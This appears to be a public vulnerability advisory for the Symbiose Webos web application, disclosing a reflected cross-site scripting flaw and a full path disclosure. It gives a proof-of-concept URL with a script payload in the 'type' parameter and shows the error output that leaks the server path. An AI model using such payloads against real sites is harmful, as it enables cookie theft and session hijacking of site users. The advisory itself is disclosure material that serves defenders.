Symbiose Webos Cross Site Scripting / Path Disclosure

2014.07.07

Credit: G4eL

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Symbiose Webos - XSS / FPD
# Date: 04 July 2014
# Exploit Author: G4eL
# Download: http://symbiose.fr.cr/
# Demo: http://webos.symbiose.fr.cr/
# Tested on: Ubuntu
http://[domain]/usr/?path=/usr/&type=1<script>alert(123)</script>
# Results :
Fatal error: Class 'lib\ctrl\rawDataCall\1<script>alert(123)</script>Controller' not found in /home/user/public_html/lib/Application.class.php on line 56
1- Cross Site Scripting (alert 123)
2- Full Path Disclosure (/home/user/public_html/)
# Issue Details :
A remote attacker could exploit this vulnerability using the host
parameter in a specially-crafted URL to execute script in a victim's Web
browser within the security context of the hosting Web site, once the
URL is clicked. An attacker could use this vulnerability to steal the
victim's cookie-based authentication credentials.
# by G4eL
# Skype : live:s3cur3

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Symbiose Webos Cross Site Scripting / Path Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.